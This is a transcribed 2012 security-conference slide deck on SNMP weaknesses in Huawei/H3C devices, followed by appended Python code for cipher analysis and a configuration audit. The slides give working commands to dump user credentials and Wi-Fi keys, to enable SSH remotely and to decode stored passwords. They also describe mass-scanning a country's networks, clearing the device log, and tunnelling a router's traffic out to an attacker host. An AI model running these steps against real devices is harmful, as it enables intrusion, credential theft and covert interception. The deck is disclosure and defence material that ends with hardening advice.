Developer Data Modeling Mistakes: From Postgres to NoSQL
 

A CouNtry's Honerable n3twork deviCes

  • 1. A CouNtry's Honorable n3twork deviCes
    Bay Threat 2012
    @grutz
    BayThreat 2012 -- @grutz   A CouNtry's Honorable n3twork deviCes
  • 2. BACKGROUND
  • 3. Disclaimer
    Any content or opinion stated herein is that of myself and not of my employer. The information is being provided "as-is" and as a convenience, for informational purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequential damages resulting from any defect, error or failure to perform. For recreational use only. May be too intense for some viewers.
  • 4. POLITICS!
    This presentation does not care about the politics between China, the US and any companies.
    Data is presented to show the pervasive risk these new vulnerabilities create.
    China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!
  • 5. About @grutz….
    Penetration tester
    In the business of breaking into businesses
    business business
  • 6. The Huawei/H3C/HP Timeline
    2006           Huawei-3Com Partnership
    May 7, 2007    H3C is born!
    Sep 28, 2007   Bain Capital / Huawei / 3Com deal
    2008           US Gov't Smackdown
    April 12, 2010 HP Acquires H3C
    Oct 8, 2012    US Gov't Huawei/ZTE Smackdown
  • 7. Huawei != H3C
    ...except when they are (software)
    Since the creation of H3C by Huawei-3Com the two companies diverged their product lines. Yet they still shared a very similar code origin (and bugs!)
    Vulnerabilities described here and in FX's talk can generally affect Huawei devices in the Huawei-3Com years (2006-2010) and all H3C devices
  • 8. FX's Huawei DEFCON Bomb
  • 9. Huawei's July 31, 2012 Response to c|net
    http://news.cnet.com/8301-1009_3-57482813-83/expert-huawei-routers-are-riddled-with-vulnerabilities/
  • 10. LETS TALK BIG BANG
  • 11. Overflows are cool…
    …but they're finicky little beasts
    Huawei/H3C not as bad as Cisco IOS but, still.. How many times have you used an IOS buffer overflow?
    No, really…
    Be serious here!
    Now how many times have you used SNMP to download device configs?
    Which would you rely upon for network penetration?
  • 12. h3c (old) vs hh3c (new)
    "For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files;"
    http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228
  • 13. (T)FTP File Transfers: hh3c-config-man
    Function                OID                                   Operator
    Operation type          1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx    1 - running2Startup
                                                                  2 - startup2Running
                                                                  3 - running2Net
                                                                  4 - net2Running
                                                                  5 - net2Startup
                                                                  6 - startup2Net
    Protocol                1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx    1 - ftp
                                                                  2 - tftp
                                                                  3 - clusterftp
                                                                  4 - clustertftp
    Filename                1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx    filename
    Destination IP Address  1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx    IpAddress
    Username                1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx    FTP Username
    Password                1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx    FTP Password
    RowStatus               1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx    4 - go go go move move move!
  • 14. hh3c-config-man caveats
    Support is spotty between device types
      Mostly routers and switches work
      H3C ERxxxx Series: OpType = 1 (system2net)
    Downloads are logged
    Requires Read/Write community string
    Buggy!
      Manual "snmpset" worked some of the time
      Metasploit module worked some of the time
  • 15. Let's script…
    https://github.com/grutz/h3c-pt-tools/blob/master/hh3c-snmpdl.sh
  • 16. HP/H3C, SNMP, LOCAL ACCOUNTS AND YOU!
  • 17. Usernames and Passwords in SNMP? Never!
  • 18. Huawei/H3C Password Encryption Types
    (h)h3cAuthMode designates encryption storage type:
      0: No encryption
      3: Ciphertext "encryption"
           7-CZB#/YX]KQ=^Q`MAF4<1!!
      9: SHA-256 encryption
           $key$hash_digest_value
           (Since 2007, Mostly AR devices)
  • 19. hh3cUserLevel / hh3cUserState
  • 20. What is MAX-ACCESS and read-create?
    RFC-1902: SMI for SNMPv2
  • 21. …so it's protected, right?
    Sure it is!
    Unless you know the SNMP READ ONLY string…
    This was probably a bug… or a misunderstanding…
  • 22. Lets glob some users!
    $ snmpwalk -c public -v 1 <host> 1.3.6.1.4.1.2011.10.2.12.1.1.1
    Walks the locally defined list of users:
    local user <username> password <clear|cipher|sha256> <value> level [0|1|2|3]
  • 23. Let's Weaponize it!
  • 24. Other SNMP goodies…
    (h)h3c-dot11-cfg - (requires R/W access)
      SSID / PSKs
      snmpwalk -v 1 -c private ip-address 1.3.6.1.4.1.2011.10.2.75
    (h)h3c-ssh - (requires R/W access)
      SSH Server disabled? Enable it!
      snmpset -v 1 -c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1
  • 25. Strap In and Let's Scan China!
  • 26. INCONCEIVABLE!
    http://www.okean.com/chinacidr.txt
    2,444 netblocks
    290,118,656 hosts
    Only care about SNMP
    Onesixtyone to the rescue!
    Originally by Solar Eclipse
    Updated in 2011 by Paul Flo Williams: https://github.com/hisdeedsaredust/onesixtyone
  • 27. L33t b@$h sk1ddy
    For best results use a VPS/host from a country China trusts
  • 28.
  • 29. China Network Device Counts (Oct 2012)
    (Bar chart, SNMP R/O vs. SNMP R/W counts per vendor; values as labelled on the chart, the larger of each pair being the R/O count)
    Huawei / H3C: 117,033 and 88,517
    ZTE: 64,579 and 33,669
    Cisco: 11,278 and 2,475
    vxWorks: 8,121
    Juniper: 273
    (one further bar labelled 99)
    Source: Personal scan of China Netblock ranges using SNMP strings "public", "private", "h3c", "china" and "telecom"
  • 30. Compare H3C results from ShodanHQ
  • 31. (h)h3c-user Results
    Devices with locally defined accounts: 15,588
    Devices with ciphered passwords:       5,132
    Devices with cleartext passwords:      15,263
    Total accounts/passwords:              33,938
    Unique passwords:                      3,898
    Username == Password:                  2,101
    Unique version strings:                686
    A majority of cleartext-only passwords were from one Telecom company.
  • 32. What Type of Accounts are these?
    Local users can be used for:
      Remote management access (telnet, ssh, web)
      VPN access
    In most cases telnet, ssh and http were open on devices with locally defined accounts.
  • 33. Device type breakdown
    Huawei/H3C VRP:              2,293
    SecPath/SecBlade Firewalls:  464
    WA2xxx Access Points:        2,771
    Huawei Quidway:              3,205
  • 34. SO ABOUT THAT CIPHER…
  • 35. Huawei/H3C Not Unique In This
    Weak and reversible ciphers seem to be a standard for all Networking companies at one time:
      Cisco Type 7 Vigenère cipher
      Juniper $9$
    Generally these are used because some protocols need to use cleartext passwords yet these should not be stored in the clear.
    So….why not ROT13? Just as secure…….
  • 36. Cipher Examples
    CLEARTEXT                  CIPHER
    a                          D(HD%5.*MN;Q=^Q`MAF4<1!!
    aa                         P+J^5@ZGG[3Q=^Q`MAF4<1!!
    aaa                        +Q4Z3D_*-N[Q=^Q`MAF4<1!!
    123                        7-CZB#/YX]KQ=^Q`MAF4<1!!
    aaaa                       EHHC8L%9.F3Q=^Q`MAF4<1!!
    aaaaa                      X`9:NJ_A#$WQ=^Q`MAF4<1!!
    aaaaaa                     B.7)"^_<OGCQ=^Q`MAF4<1!!
    huawei                     N`C55QK<`=/Q=^Q`MAF4<1!!
    aaaaaaaa                   2P;JH_C3'+_Q=^Q`MAF4<1!!
    aaaaaaaaaaaaaaaaaaaa       2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0)*5WWQ=^Q`MAF4<<"TX$_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!
    aaaaaaaaaaaaaaaaaaaaaaaa   2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX$_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!
  • 37. Want more examples? jfgi!
  • 38. This means something…
    Ciphers are 24 or 88 chars in length
    '!!' at the end of everything
    Base64 rotational? Good idea, but no… didn't pan out.
    Consistent last few bytes of data: Q=^Q`MAF4<1!!
    Consistent first 10 bytes (2P;JH_C3'+) when the cleartext is => 8 characters
  • 39. Probably using a block-based cipher
    Identical plaintext blocks encrypt to identical cipher blocks:
  • 40. Binary/ASCII Encoding
    Let's assume DES-ECB:
      Probably a static key
      Input = cleartext + null padding
      Output = binary data
    Binary result converted to printable ASCII
    ASCII NOT Base64 but similar (4 chars to 3 bytes)
    A consistent cipher string length based on source length means we're probably correct.
  • 41. Lets decode to binary!
    # Converts a (h)h3c cipher string from its printable form back to bytes:
    # each character carries 6 bits (character code minus 33, i.e. '!'..'`')
    # and four characters make 3 bytes. The letter 'a' is the printable
    # stand-in for '?' (0x3f), presumably because '?' is the CLI help key.
    def decode_cipher(cipher):
        result = bytearray()
        chkval = ord('a')
        cipherlen = len(cipher)    # 24 or 88 chars, always a multiple of 4
        cipher_loc = 0
        # converter works in groups of 4 until cipherlen is reached
        for cnt in range(0, cipherlen, 4):
            cv2 = 0
            # groups 1-4: accumulate four 6-bit values into cv2
            for group in range(4):
                cv1 = ord(cipher[cipher_loc])
                if cv1 == chkval:
                    cv1 = ord('?')
                cv1 = cv1 - 33
                cv2 = (cv2 << 6) | cv1
                cipher_loc += 1
            # output: 24 bits -> 3 bytes
            result.append((cv2 & 0xff0000) >> 16)
            result.append((cv2 & 0xff00) >> 8)
            result.append(cv2 & 0xff)
        return result
  • 42. Huawei's Solution
    Use AES-256 and updated software for SNMP
    Yes.. AES-256.. A symmetric cipher.
    http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
  • 43. HP/H3C's Solution
    Use SHA-256 on those systems that support it
    Upgrade your code for the SNMP fix.
    https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685
  • 44. So about this SHA-256…
    Yeah, salted SHA-256. Not reversible but crackable!
    h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5
    pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
  • 45. NOW WHAT?
  • 46. Things to watch out for
    All commands are logged locally
      > reset logbuffer
    Keyboard keys are very annoying
      Backspace is not backspace, unless it's ^H
  • 47. See All Packets!!!
    <rtr1> system-view
    [rtr-1] interface tunnel 1/0/1
    [rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
    [rtr-1-Tunnel1/0/1] tunnel-protocol gre
    [rtr-1-Tunnel1/0/1] source 10.10.1.1
    [rtr-1-Tunnel1/0/1] destination 192.168.1.1
    [rtr-1-Tunnel1/0/1] quit
    [rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1
    linux# modprobe ip_gre
    linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255
    linux# ip link set gre0 up
    linux# ip addr add 10.10.10.2/24 dev gre0
  • 48. PROTECT YOURSELF
  • 49. Be protected.. Be be protected!
    Don't configure local accounts, use RADIUS or TACACS+
    Don't configure SNMPv1
    Don't use default SNMP strings
    Disable the snmp view for (h)h3c-user:
      snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
      snmp-agent mib-view excluded 1.3.6.1.4.1.25506.2.12.1.1.1
    Use SHA256 passwords if your image supports it
  • 50. http://github.com/grutz/h3c-pt-tools/
    http://grutztopia.jingojango.net/
    Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-CERT and others whom I may have forgotten
    QUESTIONS?
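The cipher examples from slide 36, decoded with the slide-41 converter logic and split into DES-sized blocks, as an added example that is not part of the talk or of the h3c-pt-tools repository: it shows that every plaintext of at most 8 characters yields the same second 8-byte block (the null-padded block under a static key), which is the ECB behaviour slides 38 to 40 infer. The 6-bit alphabet offset from '!' and the 'a'-for-'?' substitution are taken from slide 41; the 8-byte block size is the DES assumption from slide 40.

```python
# Added example: decode the slide-36 ciphertext passwords and look for
# repeated 8-byte blocks, the signature of a block cipher in ECB mode with a
# static key (the inference of slides 38-40). The converter follows slide 41:
# 6 bits per character offset from '!', with 'a' standing in for '?'.
from collections import Counter

# Cleartext -> cipher pairs as printed on slide 36 (24-character form only).
SLIDE36 = {
    "a":        "D(HD%5.*MN;Q=^Q`MAF4<1!!",
    "aa":       "P+J^5@ZGG[3Q=^Q`MAF4<1!!",
    "aaa":      "+Q4Z3D_*-N[Q=^Q`MAF4<1!!",
    "123":      "7-CZB#/YX]KQ=^Q`MAF4<1!!",
    "aaaa":     "EHHC8L%9.F3Q=^Q`MAF4<1!!",
    "aaaaa":    "X`9:NJ_A#$WQ=^Q`MAF4<1!!",
    "aaaaaa":   "B.7)\"^_<OGCQ=^Q`MAF4<1!!",
    "huawei":   "N`C55QK<`=/Q=^Q`MAF4<1!!",
    "aaaaaaaa": "2P;JH_C3'+_Q=^Q`MAF4<1!!",
}
BLOCK = 8  # DES block size in bytes (slide 40's assumption)


def decode_cipher(cipher: str) -> bytes:
    """Printable form -> raw bytes: each char is 6 bits, 4 chars per 3 bytes."""
    bits, nbits, out = 0, 0, bytearray()
    for ch in cipher:
        v = (ord("?") if ch == "a" else ord(ch)) - 33   # 'a' encodes '?'
        if not 0 <= v < 64:
            raise ValueError(f"{ch!r} is outside the cipher alphabet")
        bits = (bits << 6) | v
        nbits += 6
        while nbits >= 8:                 # emit every completed byte
            nbits -= 8
            out.append((bits >> nbits) & 0xFF)
    return bytes(out)


def cipher_blocks(cipher: str) -> list:
    """The 16 payload bytes of a 24-char cipher as two 8-byte blocks.

    22 data characters carry 16 bytes (plus 4 spare bits); the trailing "!!"
    is the terminator slide 38 notes, so the last two decoded bytes are 0.
    """
    payload = decode_cipher(cipher)[:2 * BLOCK]
    return [payload[i:i + BLOCK] for i in range(0, len(payload), BLOCK)]


def repeated_blocks(ciphers) -> dict:
    """Map each ciphertext block to the number of ciphers containing it (>1)."""
    counts = Counter()
    for c in ciphers:
        for b in set(cipher_blocks(c)):
            counts[b] += 1
    return {b: n for b, n in counts.items() if n > 1}


if __name__ == "__main__":
    for pt, ct in SLIDE36.items():
        print(f"{pt:10} -> {[b.hex() for b in cipher_blocks(ct)]}")
    for b, n in repeated_blocks(SLIDE36.values()).items():
        # the shared block is E(key, 8 null bytes): the padding block
        print(f"block {b.hex()} appears in {n} of {len(SLIDE36)} ciphers")
```

The one shared block is the encryption of eight null padding bytes, which is why slide 38's constant tail "Q=^Q`MAF4<1!!" appears on every short password.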
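A configuration check for the slide-49 advice, added here as an example and not part of the talk's tooling: it parses a constructed Comware-style configuration and reports local accounts, non-SHA-256 passwords, SNMPv1, guessable community strings (the ones the slide-29 scan used) and missing mib-view exclusions for the (h)h3c-user OIDs. The command syntax (snmp-agent community / sys-info version / mib-view excluded, local-user / password) is assumed to follow the common Comware form, and both sample configurations are constructed.

```python
# Added example (not from the talk): audit a Comware-style Huawei/H3C config
# for the exposures the talk describes and the slide-49 hardening advice.
# Command syntax is the assumed common Comware form; configs are constructed.
import re

# The two (h)h3c-user OIDs slide 49 says to exclude from the SNMP view.
H3C_USER_VIEWS = {"1.3.6.1.4.1.2011.10.2.12.1.1.1",
                  "1.3.6.1.4.1.25506.2.12.1.1.1"}
# Community strings the slide-29 China scan tried.
WEAK_COMMUNITIES = {"public", "private", "h3c", "china", "telecom"}

# Constructed sample: the state the talk found in the wild.
SAMPLE_CONFIG = """\
 sysname rtr-1
 snmp-agent
 snmp-agent community read public
 snmp-agent community write Wr1te-0nly-Ops
 snmp-agent sys-info version v1 v2c
 snmp-agent mib-view excluded NoUsers 1.3.6.1.4.1.2011.10.2.12.1.1.1
local-user admin
 password cipher 7-CZB#/YX]KQ=^Q`MAF4<1!!
 service-type telnet ssh
 level 3
local-user ops
 password simple ops
 service-type telnet
"""

# Constructed sample: slide-49 advice applied (AAA server, SNMPv3, both views excluded).
HARDENED_CONFIG = """\
 sysname rtr-1
 radius scheme corp
 snmp-agent
 snmp-agent sys-info version v3
 snmp-agent mib-view excluded NoUsers 1.3.6.1.4.1.2011.10.2.12.1.1.1
 snmp-agent mib-view excluded NoUsers 1.3.6.1.4.1.25506.2.12.1.1.1
"""


def parse_config(text):
    """Pull SNMP settings and local users out of a Comware-style config."""
    facts = {"snmp": False, "communities": [], "versions": set(),
             "excluded": set(), "users": []}
    user = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("snmp-agent"):
            facts["snmp"] = True
        if m := re.match(r"snmp-agent community (read|write) (\S+)", line):
            facts["communities"].append((m.group(1), m.group(2)))
        elif m := re.match(r"snmp-agent sys-info version (.+)", line):
            facts["versions"].update(m.group(1).split())
        elif m := re.match(r"snmp-agent mib-view excluded (?:\S+ )?(\d[\d.]+)$", line):
            facts["excluded"].add(m.group(1))      # view name is optional
        elif m := re.match(r"local-user (\S+)", line):
            user = {"name": m.group(1), "ptype": None, "pvalue": None}
            facts["users"].append(user)
        elif user and (m := re.match(r"password (simple|cipher|sha256) (\S+)", line)):
            user["ptype"], user["pvalue"] = m.group(1), m.group(2)
    return facts


def audit(text):
    """Return findings as strings; an empty list means the advice is followed."""
    f = parse_config(text)
    findings = []
    if f["users"]:
        findings.append(f"{len(f['users'])} local account(s) defined; "
                        "prefer RADIUS/TACACS+")
    for u in f["users"]:
        if u["ptype"] == "simple":
            findings.append(f"local-user {u['name']}: cleartext password")
            if u["pvalue"] == u["name"]:
                findings.append(f"local-user {u['name']}: password equals username")
        elif u["ptype"] == "cipher":
            findings.append(f"local-user {u['name']}: reversible cipher password; use sha256")
    if f["versions"] & {"v1", "all"}:
        findings.append("SNMPv1 enabled")
    for access, community in f["communities"]:
        if community.lower() in WEAK_COMMUNITIES:
            findings.append(f"guessable SNMP {access} community '{community}'")
    if f["snmp"] and not H3C_USER_VIEWS <= f["excluded"]:
        missing = ", ".join(sorted(H3C_USER_VIEWS - f["excluded"]))
        findings.append("(h)h3c-user MIB not excluded from the SNMP view: " + missing)
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print("FINDING:", finding)
    print("hardened config findings:", audit(HARDENED_CONFIG))
```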